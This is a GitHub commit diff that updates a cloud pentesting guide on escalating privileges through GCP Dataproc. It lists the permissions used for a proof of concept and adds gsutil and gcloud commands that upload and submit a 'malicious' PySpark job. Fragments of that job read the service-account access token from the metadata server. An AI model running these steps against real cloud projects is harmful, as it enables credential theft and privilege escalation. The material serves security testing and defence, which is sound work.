Skip to content

Commit 44a7712

Browse files
author
Mac
committed
dataproc privesc update
1 parent 3af4043 commit 44a7712

File tree

1 file changed

+11
-2
lines changed

1 file changed

+11
-2
lines changed

src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataproc-privesc.md

Lines changed: 11 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -12,10 +12,16 @@ roles/dataproc.admin - Full control over Dataproc clusters, including creating,
1212

1313
These permissions make both roles highly sensitive and dangerous if misused.
1414

15+
## dataproc.jobs.create & dataproc.clusters.use
16+
17+
The following method - projects.regions.jobs.submit enables a SA to create a dataproc job, which can be abused as shown in the example below. it must be noted that in order to exploit these permissions SA should also have the necessary privileges to move the malicious script to the storage bucket (storage.objects.create).
18+
19+
the following permissions were assigned to the SA for the PoC (dataproc.clusters.get, dataproc.clusters.use, dataproc.jobs.create, dataproc.jobs.get, dataproc.jobs.list, storage.objects.create, storage.objects.get, storage.objects.list)
20+
1521

1622
## Privilege Escalation via Metadata Token Leaking
1723

18-
By abusing the permissions granted by roles/dataproc.editor or roles/dataproc.admin, an attacker can:
24+
1925

2026
- Submit a job to a Dataproc cluster.
2127

@@ -29,7 +35,7 @@ The following script demonstrates how an attacker can submit a job to a Dataproc
2935

3036
import requests
3137

32-
# Metadata server URL to fetch the access token
38+
## Metadata server URL to fetch the access token
3339

3440
```
3541
metadata_url = "http://metadata/computeMetadata/v1/instance/service-accounts/default/token"
@@ -53,6 +59,9 @@ if __name__ == "__main__":
5359
### Steps to exploit
5460

5561
```
62+
# Copy the script to the storage bucket
63+
gsutil cp fetch-metadata-token.py gs://dataproc-poc-bucket-hacktest/fetch-metadata-token.py
64+
# Submit the malicious job
5665
gcloud dataproc jobs submit pyspark gs://<bucket-name>/fetch_metadata_token.py \
5766
--cluster=<cluster-name> \
5867
--region=<region>

0 commit comments

Comments
 (0)